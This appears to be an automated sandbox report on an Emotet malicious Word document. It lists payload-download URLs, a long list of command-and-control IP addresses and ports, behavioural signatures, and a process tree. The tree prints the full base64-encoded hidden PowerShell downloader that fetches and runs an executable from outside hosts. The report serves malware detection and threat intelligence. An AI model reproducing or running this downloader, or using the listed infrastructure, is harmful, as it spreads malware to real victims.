Analysis
-
max time kernel
139s -
resource
win10v191014 -
submitted
10-12-2019 18:05
Task
task1
Sample
Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.63.doc
Resource
win7v191014
General
Malware Config
Extracted
http://bepeterson.futurismdemo.com/archive/y5o7/
http://www.gnc.happenizedev.com/backup/n99uf/
http://odoo-accounting.com/wp-includes/rest-api/search/R/
http://monoclepetes.com/disneyworldclassroom/sy52j7/
http://bakestories.com/0hikvh/Jm4QTsHwF/
Extracted
emotet
2.38.99.79:80
98.24.231.64:80
47.156.70.145:80
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
206.189.112.148:8080
120.150.246.241:80
190.56.255.118:80
200.71.148.138:8080
192.241.255.77:8080
211.63.71.72:8080
190.53.135.159:21
183.102.238.69:465
108.191.2.72:80
107.170.24.125:8080
167.114.242.226:8080
91.73.197.90:80
178.209.71.63:8080
217.160.182.191:8080
45.51.40.140:80
189.209.217.49:80
128.65.154.183:443
91.205.215.66:8080
95.128.43.213:8080
190.12.119.180:443
62.75.187.192:8080
12.176.19.218:80
178.210.51.222:8080
87.230.19.21:8080
110.143.57.109:80
61.197.110.214:80
67.225.179.64:8080
74.105.102.97:8080
190.226.44.20:21
93.147.141.5:80
5.196.74.210:8080
212.64.171.206:80
173.13.135.102:80
190.147.215.53:22
201.184.105.242:443
78.24.219.147:8080
201.173.217.124:443
92.186.52.193:80
12.229.155.122:80
165.228.24.197:80
31.31.77.83:443
58.171.42.66:8080
181.31.213.158:8080
101.187.247.29:80
86.98.156.239:443
87.106.139.101:8080
181.57.193.14:80
116.48.142.21:443
164.68.101.171:80
176.31.200.130:8080
209.97.168.52:8080
46.105.131.87:80
24.45.193.161:7080
190.211.207.11:443
210.6.85.121:80
139.130.241.252:443
59.103.164.174:80
176.106.183.253:8080
66.76.63.99:80
92.222.216.44:8080
159.65.25.128:8080
206.81.10.215:8080
31.172.240.91:8080
212.186.191.177:80
195.244.215.206:80
209.141.54.221:8080
104.131.44.150:8080
37.157.194.134:443
107.2.2.28:80
50.116.86.205:8080
45.33.49.124:443
91.242.138.5:80
91.231.166.126:8080
100.14.117.137:80
188.152.7.140:80
80.11.163.139:21
144.139.247.220:80
182.176.132.213:8090
212.129.24.79:8080
110.142.38.16:80
167.71.10.37:8080
87.106.136.232:8080
1.33.230.137:80
104.131.11.150:8080
101.187.134.207:443
185.159.102.74:80
70.175.171.251:80
167.99.105.223:7080
104.236.246.93:8080
197.254.221.174:80
73.11.153.178:8080
149.202.153.252:8080
169.239.182.217:8080
5.88.182.250:80
165.227.156.155:443
173.70.81.77:80
91.187.80.246:80
186.75.241.230:80
200.7.243.108:443
83.136.245.190:8080
181.143.194.138:443
80.21.182.46:80
Signatures
-
Drops file in System32 directory 6 IoCs
description ioc Process File renamed C:\Users\Admin\162.exe => C:\Windows\SysWOW64\sensorspecial.exe 162.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat sensorspecial.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 sensorspecial.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE sensorspecial.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies sensorspecial.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 sensorspecial.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4940 WINWORD.EXE 4788 162.exe 4280 162.exe 4968 sensorspecial.exe 4884 sensorspecial.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4940 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4612 Powershell.exe 4884 sensorspecial.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4280 162.exe 4884 sensorspecial.exe -
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4940 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4612 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4504 wrote to memory of 4536 4504 SppExtComObj.exe 75 PID 4612 wrote to memory of 4788 4612 Powershell.exe 79 PID 4788 wrote to memory of 4280 4788 162.exe 80 PID 4968 wrote to memory of 4884 4968 sensorspecial.exe 87 -
Executes dropped EXE 4 IoCs
pid Process 4788 162.exe 4280 162.exe 4968 sensorspecial.exe 4884 sensorspecial.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.63.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
PID:4940
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABHAHgAZgB5AGcAaQBmAGIAcgBjAGQAPQAnAFMAcQBwAGoAdAB1AHAAZAB1AHAAeAAnADsAJABVAHkAcABkAGwAZQBpAHMAaAB1AGcAIAA9ACAAJwAxADYAMgAnADsAJABCAGcAYgB3AHcAbABjAGIAagB2AGcAaQA9ACcATABjAHcAbQBjAHcAbABzACcAOwAkAFIAYwBkAHQAaABnAGEAZQBwAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFUAeQBwAGQAbABlAGkAcwBoAHUAZwArACcALgBlAHgAZQAnADsAJABCAG0AYgBuAGwAaQBoAHQAYwBuAGUAdQBxAD0AJwBPAG0AcgBoAHUAYwBrAGgAbAAnADsAJABGAGYAaQB2AGQAdQBxAGkAdgBrAHMAZgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBjAGwASQBlAG4AdAA7ACQAUABhAGEAdABnAGUAagBhAHcAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAHAAZQB0AGUAcgBzAG8AbgAuAGYAdQB0AHUAcgBpAHMAbQBkAGUAbQBvAC4AYwBvAG0ALwBhAHIAYwBoAGkAdgBlAC8AeQA1AG8ANwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAbgBjAC4AaABhAHAAcABlAG4AaQB6AGUAZABlAHYALgBjAG8AbQAvAGIAYQBjAGsAdQBwAC8AbgA5ADkAdQBmAC8AKgBoAHQAdABwADoALwAvAG8AZABvAG8ALQBhAGMAYwBvAHUAbgB0AGkAbgBnAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwByAGUAcwB0AC0AYQBwAGkALwBzAGUAYQByAGMAaAAvAFIALwAqAGgAdAB0AHAAOgAvAC8AbQBvAG4AbwBjAGwAZQBwAGUAdABlAHMALgBjAG8AbQAvAGQAaQBzAG4AZQB5AHcAbwByAGwAZABjAGwAYQBzAHMAcgBvAG8AbQAvAHMAeQA1ADIAagA3AC8AKgBoAHQAdABwADoALwAvAGIAYQBrAGUAcwB0AG8AcgBpAGUAcwAuAGMAbwBtAC8AMABoAGkAawB2AGgALwBKAG0ANABRAFQAcwBIAHcARgAvACcALgAiAFMAcABMAGAAaQBUACIAKAAnACoAJwApADsAJABTAGwAYgBpAGkAagBkAGMAdgBrAGsAcAA9ACcATgBtAGcAeQB6AHIAbABxACcAOwBmAG8AcgBlAGEAYwBoACgAJABJAG8AegByAG8AbgBuAGgAcQB5AGsAIABpAG4AIAAkAFAAYQBhAHQAZwBlAGoAYQB3ACkAewB0AHIAeQB7ACQARgBmAGkAdgBkAHUAcQBpAHYAawBzAGYALgAiAEQAYABvAHcAbgBgAEwATwBhAEQARgBJAEwARQAiACgAJABJAG8AegByAG8AbgBuAGgAcQB5AGsALAAgACQAUgBjAGQAdABoAGcAYQBlAHAAdQApADsAJABKAHUAawBpAHcAcQBlAHAAdgB0AHAAPQAnAFQAZgB1AHIAbwBrAHcAZQB4AGIAZwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQAUgBjAGQAdABoAGcAYQBlAHAAdQApAC4AIgBMAGAAZQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMwAyADAAMgA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgB0ACIAKAAkAFIAYwBkAHQAaABnAGEAZQBwAHUAKQA7ACQATQBhAGcAYwBmAG8AeQBvAHkAdgA9ACcARwB1AHQAeABsAHIAdQBtACcAOwBiAHIAZQBhAGsAOwAkAFoAdwBmAGoAaQBtAHMAZQBiAD0AJwBWAGQAdQBtAG4AcgBlAHYAcQB3AHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBrAGQAZAB1AHAAdgBxAHEAPQAnAEsAdwB2AGYAbAB2AHQAdAAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Users\Admin\162.exe"C:\Users\Admin\162.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4788 -
C:\Users\Admin\162.exe--fb74438b3⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
PID:4280
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
PID:4196
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4064
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵PID:2344
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:4840
-
C:\Windows\SysWOW64\sensorspecial.exe"C:\Windows\SysWOW64\sensorspecial.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4968 -
C:\Windows\SysWOW64\sensorspecial.exe--f3d6d3b52⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: EmotetMutantsSpam
- Executes dropped EXE
PID:4884
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵PID:672